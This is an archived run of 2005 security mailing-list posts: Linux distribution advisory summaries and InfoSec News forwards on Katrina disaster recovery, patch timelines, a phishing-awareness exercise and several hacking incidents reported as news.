This update upgrades libwnck to version 2.10.3 in order to work well with metacity 2.10.3. This updated package corrects the behavior of workspace switching when minimized windows from a different workspace than the current workspace are activated.
http://www.linuxsecurity.com/content/view/120388

+---------------------------------+
| Distribution: Gentoo            | ----------------------------//
+---------------------------------+

* Gentoo: X.Org Heap overflow in pixmap allocation
12th, September, 2005
An integer overflow in pixmap memory allocation potentially allows any X.Org user to execute arbitrary code with elevated privileges.
http://www.linuxsecurity.com/content/view/120363

* Gentoo: Python Heap overflow in the included PCRE library
12th, September, 2005
The "re" Python module is vulnerable to a heap overflow, possibly leading to the execution of arbitrary code.
http://www.linuxsecurity.com/content/view/120371

+---------------------------------+
| Distribution: Red Hat           | ----------------------------//
+---------------------------------+

* RedHat: Moderate: pcre security update
8th, September, 2005
Updated pcre packages are now available to correct a security issue. This update has been rated as having moderate security impact by the Red Hat Security Response Team.
http://www.linuxsecurity.com/content/view/120337

* RedHat: Moderate: exim security update
8th, September, 2005
Updated exim packages that fix a security issue in PCRE and a free space computation on large file system bug are now available for Red Hat Enterprise Linux 4. This update has been rated as having moderate security impact by the Red Hat Security Response Team.
http://www.linuxsecurity.com/content/view/120339

* RedHat: Critical: firefox security update
9th, September, 2005
An updated firefox package that fixes a security bug is now available for Red Hat Enterprise Linux 4. This update has been rated as having critical security impact by the Red Hat Security Response Team.
http://www.linuxsecurity.com/content/view/120352

* RedHat: Critical: mozilla security update
9th, September, 2005
An updated mozilla package that fixes a security bug is now available. This update has been rated as having critical security impact by the Red Hat Security Response Team.
http://www.linuxsecurity.com/content/view/120353

* RedHat: Important: XFree86 security update
12th, September, 2005
Updated XFree86 packages that fix several integer overflows are now available for Red Hat Enterprise Linux 2.1. This update has been rated as having important security impact by the Red Hat Security Response Team.
http://www.linuxsecurity.com/content/view/120372

* RedHat: Important: xorg-x11 security update
13th, September, 2005
Updated X.org packages that fix several integer overflows are now available for Red Hat Enterprise Linux 4.
This update has been rated as having important security impact by the Red Hat Security Response Team.
http://www.linuxsecurity.com/content/view/120378

* RedHat: Important: XFree86 security update
15th, September, 2005
This update has been rated as having important security impact by the Red Hat Security Response Team.
http://www.linuxsecurity.com/content/view/120390

* RedHat: Important: squid security update
15th, September, 2005
An updated Squid package that fixes security issues is now available. This update has been rated as having important security impact by the Red Hat Security Response Team.
http://www.linuxsecurity.com/content/view/120391

------------------------------------------------------------------------
Distributed by: Guardian Digital, Inc. LinuxSecurity.com

To unsubscribe email vuln-newsletter-request@linuxsecurity.com with "unsubscribe" in the subject of the message.
------------------------------------------------------------------------

From isn at c4i.org Mon Sep 19 02:09:31 2005 From: isn at c4i.org (InfoSec News) Date: Mon Sep 19 02:14:53 2005 Subject: [ISN] Bruce Schneier: Wrong on Katrina, Wrong on Terrorism Message-ID: Forwarded from: Dan Verton http://www.itsecuritymagazine.com/its/Editors%20Desk/verton_opinion_schneier_091505.htm Bruce Schneier: Wrong About Katrina, Wrong About Terrorism Posted 9/15/05 By Dan Verton Executive Editor Homeland Defense Journal The Minneapolis Star Tribune recently ran an editorial by Bruce Schneier, the chief technology officer at Counterpane Internet Security Inc., in which the esteemed technologist blamed the failure of federal, state and local officials to respond effectively to the aftermath of Hurricane Katrina on a lack of funding for emergency responders.
He also implies that America's homeland security community can prepare for both natural disasters and terrorist attacks in the same way because, according to Schneier, large-scale terrorist attacks and natural disasters "are very similar in aftermath." Schneier, a technologist with no known formal training and education in military operations or traditional security, is wrong on both accounts. First off, no amount of money could have made up for the leadership failure at all levels of government that led to the post-Katrina response disaster. Money cannot fix a broken decision cycle or the inability of federal, state and local officials to properly plan for a disaster. More money would not have pre-deployed the appropriate number of National Guard troops, generators for hospitals, buses for evacuees who had no transportation, or critical supplies, such as food, water and medicines. All of those necessities existed prior to Katrina making landfall. What prevented the effective use of those assets was a failure of leadership and imagination. If you want to know how federal, state and local leaders failed, seek answers to the following questions: 1. Why didn't Louisiana Governor Kathleen Blanco order the pre-positioning of adequate forces and first-responders? Could it be that she was betting the storm would turn at the last moment and that the levees would hold? 2. Why did New Orleans Mayor Ray Nagin fail to use all of the transportation assets at his disposal to bus people out of the city days before Katrina hit? And if he was not given appropriate resources by the state, why didn't he approach the federal government for direct assistance? 3. Why didn't the federal government, specifically Secretary of Homeland Security Michael Chertoff and the now former director of FEMA, Michael Brown, question what was clearly an inadequate pre-disaster plan in New Orleans? Isn't that a key responsibility of those overseeing the nationwide homeland security mission? 
So please, Mr. Schneier, don't tell America or the people of New Orleans that money could have prevented their suffering. It is not only preposterous to blame the response failure on money (although funding for first responders and the oversight of how those monies are used have been issues that the Bush administration has failed to address) but such ill-informed statements threaten to distract attention from the real issue of failing leadership and a lack of imagination in disaster planning. That brings me to my second point. Mr. Schneier wants Americans to believe that terrorists and hurricanes are alike, and that if we can properly prepare for one we will be prepared for the other. This is perhaps the most preposterous claim made in his editorial and one that clearly shows the limit of Mr. Schneier's homeland security expertise. This is not a personal attack. But Mr. Schneier is a technologist and has spent his entire career doing things like writing encryption algorithms. He has not spent any time to my knowledge in the trenches managing military or government homeland security initiatives. What Mr. Schneier fails to understand is that while terrorist attacks and natural disasters may in fact lead to a comparable amount of confusion - what is known in military parlance as the fog of war - they differ significantly in many critical aspects. First, natural disasters are random events that can leave one facility in shambles while a neighboring facility remains unscathed. In addition, natural disasters, particularly hurricanes, are known events that give ample indications and warning as to their intended target area and potential for destruction. A hurricane should be a homeland security or emergency manager's dream scenario - because if you have to experience a disaster, you might as well experience one that you have days to prepare for. Terrorists, on the other hand, are not the mindless forces of nature that hurricanes are. 
Terrorists plan their attacks, sometimes years in advance. They also carefully select their targets - there is very little randomness to terrorist attacks, particularly the new terrorism as characterized by Osama bin Laden and al-Qaeda. Hurricanes do not care if they damage critical infrastructures. Al-Qaeda trains its operatives in the most effective ways to destroy or damage critical infrastructures. Hurricanes do not care about the financial toll that follows their powerful blow. Osama bin Laden is on film trying to assess the cost to the U.S. economy of the Sept. 11, 2001 terrorist attacks. Likewise, hurricanes do not intentionally target symbols of American government and economic power. Terrorists have made those symbols a primary target. Hurricanes do not conduct surveillance of their potential landfall areas and produce targeting packages designed to ensure the greatest chance of success. Terrorists, particularly al-Qaeda, do. Hurricanes do not time their landfall with the morning or evening rush hour, they do not target specific economic sectors of the economy, and they do not seek out population centers. Terrorists do. Finally, hurricanes are not gathering in far away places conspiring to acquire weapons of mass destruction and planning ways to smuggle those weapons into the United States. Al-Qaeda is doing just that. And when they get here, they will not provide us with advance indications and warning that we are so lucky to receive from our natural enemy, the hurricane. -=- About The Author Dan Verton is the author of three books on security and terrorism, and has advised the Department of Homeland Security, the FBI and the U.S. Secret Service. He currently serves as the executive editor of Homeland Defense Journal and IT*Security Magazine, and is a former intelligence officer in the United States Marine Corps. 
Visit him online at www.danverton.com From isn at c4i.org Tue Sep 20 04:06:57 2005 From: isn at c4i.org (InfoSec News) Date: Tue Sep 20 04:13:01 2005 Subject: [ISN] Financial Firms Create Disaster Recovery Standards Message-ID: http://www.computerworld.com/securitytopics/security/recovery/story/0,10801,104724,00.html By Lucas Mearian SEPTEMBER 19, 2005 COMPUTERWORLD Driven by a number of disasters in recent years, several financial services firms and IT vendors have joined forces to create disaster recovery and business continuity standards. The Resiliency Maturity Model Project, overseen by the New York-based Financial Services Technology Consortium, will create benchmarks and define terms for business continuity planning across all areas of a financial enterprise, said Charles Wallen, managing executive of FSTC's Business Continuity Standing Committee and the project's director. Plans to create the standards, which will also be available to companies in other industries, were announced last week by the FSTC. Wallen said recent disasters like Hurricane Katrina reaffirm the need for "strong business continuity plans and a road map for third-party providers to understand what's needed. We have to do a better job at raising the bar." Financial services companies involved in the project include CitiBank, J.P. Morgan Chase & Co., Bank of America Corp. and MasterCard International Inc. IBM, Carnegie Mellon University and Disaster Recovery Institute International are also participating. A Measure of Resiliency A MasterCard spokeswoman said her company hopes the project can help other organizations move beyond disaster recovery into organizational sustainability. "We're looking at models to measure the resiliency of an organization," she said. Wallen said the project, slated to be completed next spring, should give companies a road map to plan and measure their resiliency against a set of industry standards. 
Brian Finley, chief technology officer at PSSD/World Medical Inc., a $1.5 billion medical equipment supply company in Jacksonville, Fla., agreed with the need for such standards but predicted that few companies will use them to prepare for disasters. "I've seen and heard of customers that never test [disaster recovery plans]," Finley said. "Even if you create a set of standards, somebody's got to buy into those standards, and someone has to financially back the testing and documentation and the process and controls around it." PSSD is not involved in the standards project. The Resiliency Maturity Model Project is being carried out in two phases. The first, expected to be completed this month, will identify a list of disaster recovery capabilities that companies need. Pittsburgh-based Carnegie Mellon is providing the project with some maturity modeling methodologies that can identify different levels of preparedness organizations can reach. The second phase, to be completed next spring, will include benchmarks and maturity models that will let companies compare their preparedness against some 40 standard capabilities. Guillermo Kopp, an analyst at TowerGroup in Needham, Mass., said he believes the effort could lead to more business adoption of disaster recovery standards, because such frameworks can prove return on investment. "The challenge is to keep the level of attention high," he said. "These projects are not a slam-dunk. It's more of a journey." From isn at c4i.org Tue Sep 20 04:07:29 2005 From: isn at c4i.org (InfoSec News) Date: Tue Sep 20 04:13:24 2005 Subject: [ISN] OSS means slower patches Message-ID: http://australianit.news.com.au/articles/0,7204,16650762%5E15306%5E%5Enbv%5E,00.html Chris Jenkins SEPTEMBER 19, 2005 THE growing popularity of open-source browsers and software may be responsible for the increasing gap between the exposure of a vulnerability and the provision of a patch to fix it, security software vendor Symantec has said.
In its second Internet Security Threat Report for 2005, Symantec found the time from vulnerability to the availability of a patch has "blown out" to 54 days in the period from January to June, Symantec Australia managing director David Sykes said. Symantec had not previously published statistics on the average time required to produce patches, but Mr Sykes said data showed the lag had previously been about 30 days. An average of 10 new vulnerabilities per day were discovered during the first half of 2005, Mr Sykes said. In practice, large companies with around 10,000 employees were now looking at 50 days between vulnerability and the installation of patches across systems, he said. Mr Sykes said the increasing popularity of open source software, such as the Mozilla Foundation's Firefox browser, could be part of the reason for the increase in the gap between vulnerability and patch, with the open source development model itself part of the problem. "It is relying on the goodwill and best efforts of many people, and that doesn't have the same commercial imperative," he said. "I'm sure that is part of what is causing the blow-out in the patch window." "The Mozilla family of browsers had the highest number of vulnerabilities during the first six months of 2005, with 25," the Symantec report says. "Eighteen of these, or 72 per cent, were rated as high severity. Microsoft Internet Explorer had 13 vendor confirmed vulnerabilities, of which eight, or 62 per cent, were considered high severity." The growth in Firefox vulnerability reports coincides with its increasing popularity with users. "It is very clear that Firefox is gaining acceptance and I would therefore expect to see it targeted," Mr Sykes said. "People don't attack browsers and systems per se, they attack the people that use them," he said. "As soon as large banks started using Linux, Linux vulnerabilities started to get exploited."
The report also found that recent internet attacks had aimed at different targets. "For the first time, the education sector and small business came in front of financial services as the most attacked industries," Mr Sykes said. From isn at c4i.org Tue Sep 20 04:07:53 2005 From: isn at c4i.org (InfoSec News) Date: Tue Sep 20 04:13:39 2005 Subject: [ISN] Two of accused hacker trio allowed back in Bay High classes Message-ID: http://www.theledger.com/apps/pbcs.dll/article?AID=/20050919/APN/509191190 The Associated Press PANAMA CITY, Fla. September 19, 2005 Two of the three students accused of hacking into a Bay County computer system and changing grades for friends have since been allowed back in class, but the third was expelled for one semester. Beau Brothers, 16, was expelled after three of five county school board members voted to support the move. Brothers was charged with offense against intellectual property, a felony, earlier this month. His alleged cohorts, Jeremiah Mason and Kyle Parkinson, both 16, served suspensions before returning to school. They are charged with being a principal to offense against intellectual property, also a felony. Brothers committed the crime while Mason and Parkinson "assisted," sheriff's investigator Paul Vecker told The News Herald of Panama City for its Tuesday editions. The teens reportedly gained access to the system when a teacher allowed them to use a computer that was linked to the programs storing grades and school attendance records. The students were not given passwords to the system, but were able to gain entry anyhow. Teachers discovered the grade changes when they routinely checked grade books to make sure they matched report cards. The alleged hackers were in advanced computer classes and didn't need to change their own grades because they were good students, school officials said. 
From isn at c4i.org Tue Sep 20 04:06:28 2005 From: isn at c4i.org (InfoSec News) Date: Tue Sep 20 04:14:01 2005 Subject: [ISN] NSF, Iowa State to launch cybersecurity center Message-ID: http://www.networkworld.com/news/2005/091995-nsf-cybersecurity.html By Grant Gross IDG News Service 09/19/05 Iowa State University and the U.S. National Science Foundation (NSF) will join with private businesses to attack cybersecurity problems such as wireless security in a research center opening this year, participants were to announce Monday. The new Center for Information Protection, funded mostly through membership fees paid by cybersecurity vendors and users, will focus on short-term cybersecurity issues, possibly including research on methods to comply with federal regulations such as Sarbanes-Oxley, said Doug Jacobson, an Iowa State engineering professor and CTO at Palisade Systems, a network management and security vendor. The center, the first cybersecurity-focused effort in the NSF's Industry/University Cooperative Research Centers Program, will focus on issues identified by member companies, Jacobson said. The program has provided seed money for dozens of research projects, many of which are spun out into organizations fully supported by private industry. The goal of the center will be to come up with new technologies that participants can use to fight common cybersecurity problems, Jacobson said. The intellectual property developed by the center will be shared among member organizations, and members will be able to use the ideas that are generated in products they sell. So far, about 15 organizations have signed up as charter members of the Center for Information Protection, which will be based at Iowa State, Jacobson said. The center is looking for a range of companies, including cybersecurity vendors and consumers of cybersecurity products, he added. 
"We want to bring together not only providers of security solutions, but we want to bring together organizations that have the problems," he said. "We're kind of a neutral third party. We're trying to bring all these people together to solve problems." Among the center's charter members are Palisade Systems, The Boeing Co., Cargill and the New Jersey Institute of Technology. The new center will focus on near-term cybersecurity issues, unlike the NSF's Global Environment for Networking Investigations, or GENI, initiative, announced last month. Backers of GENI have proposed an NSF project to come up with a more secure, next-generation Internet, but that project would focus its efforts on a futuristic approach. Instead, the Iowa State center will take a shorter view, Jacobson said. "We're focusing on problems that are a year or two years out," he said. "We're focused on the problems the companies have today." NSF has funded a number of projects focused on network security since the U.S. Congress passed the Cybersecurity R&D Act in 2002, said Carl Landwehr, coordinator of the Cyber Trust program in the NSF's Computer and Information Science and Engineering Directorate. "There's a growing awareness that cybersecurity is limiting what we are confident doing over the Internet," Landwehr said. "The National Science Foundation is trying to address that." In addition to creating new cybersecurity technology, the new center can also educate people about the importance of cybersecurity and train new experts, Landwehr said. "We need technologists educated in these areas." From isn at c4i.org Tue Sep 20 04:08:30 2005 From: isn at c4i.org (InfoSec News) Date: Tue Sep 20 04:14:21 2005 Subject: [ISN] S. Korea steps up security measures on electronic commerce Message-ID: http://english.yna.co.kr/Engnews/20050920/660000000020050920114009E8.html 2005/09/20 SEOUL, Sept. 
20 (Yonhap) -- South Korea unveiled a set of security measures on electronic commerce Tuesday, hoping to ease consumer fears about buying goods or conducting banking transactions on the Internet. Under the three-pronged measures, the government will build and distribute new anti-hacking software with stronger security features, the Ministry of Information and Communication said in a statement. In addition, Internet users will be required to install a firewall program for all kinds of online financial transactions such as stock trading and insurance, to prevent hackers from stealing personal information. So far, only Internet banking users have been required to install the firewall software. The government also plans to overhaul its management system on public authentication service, which guarantees users' identification in the cyber marketplace. The measures were jointly drawn up by related government offices such as the Financial Supervisory Service and the Ministry of Commerce, Industry and Energy, the Information Ministry said. South Korea is one of the world's most wired countries. More than 12 million people out of its 48 million population have a high-speed Internet connection, marking the world's highest per-capita broadband Internet penetration. Worries about sending personal data or credit card information through cyberspace have long served as a drag on e-commerce, ministry officials said. From isn at c4i.org Wed Sep 21 00:10:47 2005 From: isn at c4i.org (InfoSec News) Date: Wed Sep 21 00:20:42 2005 Subject: [ISN] PG&E says firm fired for hacking Message-ID: http://www.insidebayarea.com/trivalleyherald/localnews/ci_3045437 By Greg Chang BLOOMBERG NEWS 09/20/2005 PG&E Corp's Pacific Gas & Electric utility said it fired a consulting company suspected of hacking into the computer system of an irrigation district that's trying to take over territory from the utility.
An employee of the consultant, Meridian Pacific Inc., allegedly obtained computer files last week from the Manteca-based South San Joaquin Irrigation District, which is attempting to take over territory with about 35,000 power meters, PG&E spokesman Jon Tremayne said in an interview Monday. Executives at Meridian didn't respond immediately to a phone call seeking comment.

"It's very clearly unethical behavior, and from our perspective it's absolutely unacceptable," Tremayne said.

The incident underscores challenges San Francisco-based PG&E faces from public agencies and government-owned utilities seeking to offer electric services at lower prices. The Sacramento Municipal Utility District is attempting to take over part of the utility's territory near the cities of Davis and Woodland.

"I'm disappointed but I'm not surprised," said Jeff Shields, utility systems director at the South San Joaquin Irrigation District, who has been spearheading the district's drive to acquire a 112-square-mile portion of Pacific Gas's territory.

A Meridian Pacific employee who was attending the Sept. 13 meeting of the South San Joaquin Irrigation District's board allegedly broke into the district's system and downloaded files by accessing a wireless network, Tremayne said. Six or seven of the documents were e-mailed to an employee of PG&E, Tremayne said.

The employee contacted the utility's legal department after reviewing two of the documents, and the Federal Bureau of Investigation and South San Joaquin Irrigation District were notified, he said. FBI officials weren't immediately available for comment.

From isn at c4i.org Wed Sep 21 00:11:01 2005
From: isn at c4i.org (InfoSec News)
Date: Wed Sep 21 00:21:03 2005
Subject: [ISN] Navy restricts use of handheld devices
Message-ID:

http://www.fcw.com/article90865-09-20-05-Web

By Frank Tiboni
Sept.
20, 2005

Two months after issuing guidelines on the appropriate use of information technology, the Navy has released rules for handheld devices, including wireless telephones.

Navy personnel can use wireless phones, personal digital assistants (PDAs) and calling cards only for "official and authorized purposes." If they use them for personal use, they must reimburse the government for the use and charges, according to a Navy memo titled, "Department of the Navy Policy for Issuance, Use and Management of Government-Provided Mobile (Cellular) Phone, Data Equipment and Services, and Calling Cards." [1]

Dave Wennergren, the Department of the Navy's chief information officer, said in the memo that the policy will improve accountability and management of wireless phones, PDAs and calling cards. He said the service must also "move away from suboptimized independent management of telecommunications to a centralized enterprisewide approach."

Leaders of the Navy and Marine Corps must manage the use of these devices and enforce the new rules. They must also ensure that workers receive wireless security training.

In July, the Navy issued policy for the acceptable use of IT. One of the six rules states that personnel can no longer access personal e-mail accounts from the service's networks without approval.

[1] http://www.doncio.navy.mil/(tnvffhbnek2nxretrbnwj3ne)/PolicyMatrix/download.aspx?id=97e0d5c7-b312-4caf-acba-a512c75a3e4d

From isn at c4i.org Wed Sep 21 00:09:43 2005
From: isn at c4i.org (InfoSec News)
Date: Wed Sep 21 00:21:32 2005
Subject: [ISN] Google to launch Wi-Fi service?
Message-ID:

http://www.networkworld.com/news/2005/092005-google-wi-fi.html

By Nancy Gohring
IDG News Service
09/20/05

Google may be close to launching a Wi-Fi service. A page on the Google Web site instructs customers on how to download Google Secure Access, a client that the site says "allows you to establish a more secure connection while using Google WiFi."
A Google spokeswoman could not comment further on the company's Wi-Fi plans or strategy.

In April, Google began sponsoring a free hot spot in San Francisco's Union Square. In August, Business 2.0 magazine published a report on rumors that Google had begun buying access to fiber across the U.S. Industry observers have since speculated that Google may be on the verge of offering some sort of access service, potentially using Wi-Fi.

The Google Web page says that the Secure Access program can be downloaded at certain Google Wi-Fi locations in the San Francisco Bay area. However, the client can in fact be downloaded to any computer that is connected to the Internet. The page also says that while Google Secure Access should work at any Wi-Fi location, Google hasn't tested it elsewhere.

Information about the Secure Access client is available on the Google Web site [1].

[1] http://wifi.google.com/faq.html

From isn at c4i.org Wed Sep 21 00:09:59 2005
From: isn at c4i.org (InfoSec News)
Date: Wed Sep 21 00:21:53 2005
Subject: [ISN] Vigilance, Resilience Key to Cyber Security, Says New York State Official
Message-ID:

http://www.govtech.net/magazine/channel_story.php/96708

By Wayne Hanson
Sept 20, 2005

"We just did a phishing exercise to 10,000 desktops," said Will Pelgrin, director of the New York State Office of Cyber Security and Critical Infrastructure Coordination. "We sent out a generic advisory on phishing, and no one was aware there would be an exercise to follow."

About a month after the advisory, an e-mail arrived on those agency desktops. It came from outside, but appeared to be from state government. It said that since security was so important, and that passwords were the first line of defense, the state had developed a password checker for state employees.

"It asked them to enter their personal password and user ID to see how good their passwords were," said Pelgrin. "Out of 10,000 employees, we had about 17 percent that fell prey to it at that time.
A month or so later we went back to the same cohort of individuals to see if they learned from the educational component of this, and we cut our numbers down to about seven percent. Now," he said, "the job is to get to those seven percent."

Pelgrin said the approach was "warm and fuzzy." Commissioners of affected agencies signed off on the exercise beforehand and looked at all documents before they were sent. And no information was collected on who fell for the ruse, just aggregate statistics. Those that provided a password and user ID got a message telling them what the exercise was all about, a video explaining the dangers of providing the information, and a survey.

"From the survey," said Pelgrin, "we got a lot of responses that it taught them something about phishing, not only at work -- since we filter out a lot of that crud here -- but at home where you get much more of it."

"This is about vigilance and resilience," he said. "One hundred percent security will never be obtainable. If you think you're safe, you're not secure. 9/11 taught us not to say things won't occur. Vigilance has to be there. Cars are becoming safer every day but you still need to buckle your seat belt."

In keeping with that premise, Pelgrin has expanded the efforts of his office to educate and inform state and local government, law enforcement, and the public. His office -- along with the Department of Homeland Security's National Cyber Security Division and other organizations -- developed a cyber-security awareness program for New York that other state and local governments around the country are invited to use.

New York Governor E. Pataki proclaimed October as Cyber Security Awareness Month for the state, and Pelgrin and others are working to expand the idea nationwide, providing materials and programs to state and local governments.

"We do a Web cast every other month," said Pelgrin.
"It started out as a New York State effort and quickly became a national one, and is now international. We've had up to nine countries participate in those Web casts. I choose the topic area, and we look for vendors that could do the presentation. They are not unique to any vendor, they have to be generic ... things that people could take and actually implement to make themselves more secure than they were the day before.

"We've done vulnerability risk assessments," he said, "taught people how to identify spyware, adware, and what to do about it. Over the last year, we've done about seven of those."

Protecting Children

"For October," said Pelgrin, "our theme is protecting children on the Internet. The slogan is: 'It's everyone's responsibility.' Parents, teachers, law enforcement, government -- everyone needs to take a role to ensure our children are protected and also that children don't become the next hacking generation. We're really concerned that we've got to change the culture that a script kiddie is not a rite of passage -- it's wrong. We need to teach cyber ethics. We're all told that it's wrong to steal physical items, and only recently have we begun to teach kids that it's wrong to download copyrighted music. How can we make them good cyber citizens, how can we build into this culture?

"Our governor has asked me to put on a major conference Oct. 20th," said Pelgrin, "and GTC is partnering with us on it. There will be about 1,000 adults, with a separate track for about 1,200 fourth and fifth graders. For the children we've hired a company ... which will do an interactive play on cyber security for the children. It will be streaming video and we're filming that and it will be broadcast by satellite, and we will make [the film] available to state and local governments.

"We're asking schools across the country to participate by having classrooms set up. We're using some of the curriculum from Cybersmart as the basis for that scripting.
"The governor will keynote the conference," said Pelgrin. "We have Alan Paller, director of research for the SANS Institute as second keynote, and we have Patrick Gray, director of X-Force Operations for ISS, doing the third keynote. And Howard Schmidt will be doing the VIP reception the night before."

As if that weren't enough, Pelgrin has also contributed an introduction to a book coming out next year, The Black Book on Government Security.

"Computer technology was really created as an enabler to make our lives more efficient, more effective, to be able to communicate, provide customers with better service, promote e-commerce, etc.," he said. "Cyber security was always looked at as the impediment -- it's going to cost money, take time, etc. Now, though," he said, "because of attacks on technology, cyber security has changed from an impediment to an enabler ... We're to the point where security is critical, it's not an afterthought.

"If security doesn't get down to the desktop level," he said, "we'll all lose."

Note: Director Pelgrin did not present at GTC East this year, but was interviewed by phone last week.

From isn at c4i.org Wed Sep 21 00:10:28 2005
From: isn at c4i.org (InfoSec News)
Date: Wed Sep 21 00:22:14 2005
Subject: [ISN] Re: [Full-disclosure] OSS means slower patches
Message-ID:

Forwarded from: security curmudgeon

To: full-disclosure@lists.grok.org.uk
Cc: editorial@australianIT.com.au
Date: Mon, 19 Sep 2005 09:53:40 -0400 (EDT)
Subject: Re: [Full-disclosure] OSS means slower patches

: http://australianit.news.com.au/articles/0,7204,16650762%5E15306%5E%5Enbv%5E,00.html

The obvious criticism:

"The Mozilla family of browsers had the highest number of vulnerabilities during the first six months of 2005, with 25," the Symantec report says. "Eighteen of these, or 72 per cent, were rated as high severity. Microsoft Internet Explorer had 13 vendor confirmed vulnerabilities, of which eight, or 62 per cent, were considered high severity."
Microsoft IE had at least 19 vulnerabilities from 2005-01-01 to 2005-06-30. Why does Symantec make the distinction of "X vulnerabilities in Mozilla" vs "MSIE had X *vendor confirmed vulnerabilities*"? This all too conveniently allows the silently patched vulnerabilities to slip through the cracks of our statistics. Does Mozilla's honesty in acknowledging vulnerabilities come back to bite them in the ass?

Mozilla browsers had more than 25, but are 72 per cent really "high severity"? Download information spoofing x2, File extension spoofing, URL restriction bypass, DoS x2, redirect spoofing, XSS, link status bar spoofing, Dialog overlapping, URL Wrap Obfuscation.. are all of these really "high severity"? Is that theoretical, practical, or hype?

Now, the media/Symantec driven propaganda (for lack of better word?):

THE growing popularity of open-source browsers and software may be responsible for the increasing gap between the exposure of a vulnerability and the provision of patch to fix it, security software vendor Symantec has said.

Mr Sykes said the increasing popularity of open source software, such as the Mozilla Foundation's Firefox browser, could be part of the reason for the increase in the gap between vulnerability and patch, with the open source development model itself part of the problem.

"It is relying on the goodwill and best efforts of many people, and that doesn't have the same commercial imperative," he said. "I'm sure that is part of what is causing the blow-out in the patch window."

The growth in Firefox vulnerability reports coincides with its increasing popularity with users. "It is very clear that Firefox is gaining acceptance and I would therefore expect to see it targeted," Mr Sykes said.

"People don't attack browsers and systems per se, they attack the people that use them," he said. "As soon as large banks started using Linux, Linux vulnerabilities started to get exploited."
The premise of this article is open source software is to blame for longer vendor response times. In layman's terms, blame vendors like Mozilla for having vulnerabilities patched slower? Err, compared to what? This shallow article doesn't even qualify that statement! Slower than previous vulnerabilities? Slower than non open source? Given the article directly compares Mozilla browsers to Microsoft IE, it is trivial to assume the claim is made in relation to closed source vendors such as Microsoft. So then what .. 30 days "blown out" to 54 days is some huge time gap compared to Microsoft IE patches? What clueless *moron* really believes this crap they are shovelling? Is it Symantec or Chris Jenkins or Australian IT?

Given that Symantec won't even quote previous statistics:

"Symantec had not published previously statistics on the average time required to produce patches, but Mr Sykes said data showed the lag had previously been about 30 days."

Given that Jenkins/AusIT/Symantec won't give us any statistics (even questionable ones) regarding MSIE patches, we're supposed to take this at face value? It is *well documented* that Microsoft takes well over 30 days to patch vulnerabilities. It is also becoming crystal clear that Microsoft is hiding behind their "30 day patch cycle" to imply that is the longest they go before patching a vulnerability, when it simply is not the case.

Taking a look at a *single vendor* [1] and their experience with reporting vulnerabilities to Microsoft, we see that they give MS a 60 day window to patch vulnerabilities, and are consistently overdue. As of this mail, the worst is *ONLY* 114 days past due (we've seen it closer to 250 days before).

So again, where are these implications coming from? Where does this statement/conclusion/observation that "OSS causes slower patches" come from exactly?

[1] http://www.eeye.com/html/research/upcoming/index.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

From isn at c4i.org Wed Sep 21 00:11:26 2005
From: isn at c4i.org (InfoSec News)
Date: Wed Sep 21 00:22:46 2005
Subject: [ISN] Backups Enabled Systems to Survive
Message-ID:

http://www.washingtonpost.com/wp-dyn/content/article/2005/09/20/AR2005092001453.html

By Elissa Silverman and Neil Irwin
Washington Post Staff Writers
September 21, 2005

The rescue effort began two days after the city flooded, and interim technology manager Rajeev Jain entered the building not knowing what to expect. The ground floor of the New Orleans school system headquarters was under three inches of water, and when he headed upstairs, he saw that the fourth-floor ceiling was damaged and leaking.

Jain hailed police to sledgehammer through a locked door. He found what he was looking for in a storage closet: 170 dry and apparently undamaged computer backup tapes storing recently updated payroll records and other critical financial information.

Working from an International Business Machines Corp. data recovery center in New York, Jain and colleagues from Alvarez & Marsal Business Consulting LLC were able to recreate the school district's computer system from afar. Last week the school system resumed issuing paychecks to New Orleans teachers.

As the Gulf Coast cleans up after Hurricane Katrina, computer consultants, data recovery companies, and government and business officials say the area was apparently spared the worst when it comes to the condition of the computer records and backup systems. Government institutions and large companies generally had adequate backup systems in place and data-recovery contracts with firms such as IBM to help rescue damaged data tapes and rebuild software systems. The best-prepared had backup files stored on computers outside the hurricane zone.

"I don't know of any situation we're dealing with . . .
right now that the data is not recoverable," said Don DeMarco, general manager for IBM's business continuity and recovery sector.

Disaster recovery has become a $6 billion share of the computer industry as companies and governments have taken to heart the lessons of lightning strikes, floods and other incidents, such as the Sept. 11, 2001, terrorist attacks. Unlike physical assets such as a building or inventory, lost information can be impossible to replace and can make it nearly impossible for a business to reopen. Major companies such as IBM and SunGard Data Systems Inc. have entire corporate campuses devoted to data recovery.

Concerns about file protection have even shaped government decisions about where to put offices. In May, the Agriculture Department, for example, said it planned to move the payroll and other operations of its National Finance Center from New Orleans to Kansas City, Mo. The agency noted in announcing the move that computer operations in New Orleans "have significant exposure to risk" -- and indeed the facility's operations had to be shifted to off-site backup locations after the hurricane.

Not everybody was protected. Kyle Mickelson, who runs a computer repair and support business in Gulfport, Miss., said that a number of his clients did not have backup accounting or customer records and lost all that information in the storm. He has also taken in dozens of water-damaged computers and hasn't been able to recover data from any of them.

Others who thought they had made adequate precautions found that the magnitude of Katrina overwhelmed even the best planning. Jacqueline Mae Goldberg, a personal injury lawyer who practiced in New Orleans, said she created backup files and stored them at her home. In an e-mail she said both places were wrecked by the storm.

"We've had a number of calls from companies in utter chaos," said Mike Sullivan, a senior vice president of VeriCenter Inc., a Texas firm that does data storage and backup.
"They're at risk of losing their business, especially small and mid-sized companies." The extent of such damage will take time to assess.

Those businesses that did have backup and emergency plans sometimes found that it not only protected their data, but also kept them operating throughout the hurricane and its aftermath. SCP Pool Corp., a New Orleans-based wholesaler of pool supplies, was able to relocate its corporate headquarters to VeriCenter's Dallas offices, where critical company information was backed up. As a result, there was no significant disruption to the delivery and distribution of its products from 200 centers around the country, said technology director Tim Babco.

© 2005 The Washington Post Company

From isn at c4i.org Wed Sep 21 00:13:21 2005
From: isn at c4i.org (InfoSec News)
Date: Wed Sep 21 00:23:06 2005
Subject: [ISN] Upcoming Black Hat events announcement
Message-ID:

Forwarded from: Jeff Moss

Dear Info Security News readers,

I want to keep you up to date with what Black Hat is up to. Currently there is a stand alone training in Seattle in October, a Briefings in Tokyo in October, and a Federal Training and Briefings in Crystal City in January. Black Hat returns to Amsterdam at the end of February with expanded training and briefings. The CFP for Amsterdam will open by October 15th.

Video from the summer USA show is starting to get encoded, and we will be updating the Black Hat "Black Pages" in the coming weeks to reflect what happened, and still is happening, with the whole ISS/Cisco drama.

Thank you.

Jeff Moss

--------------

Seattle Training

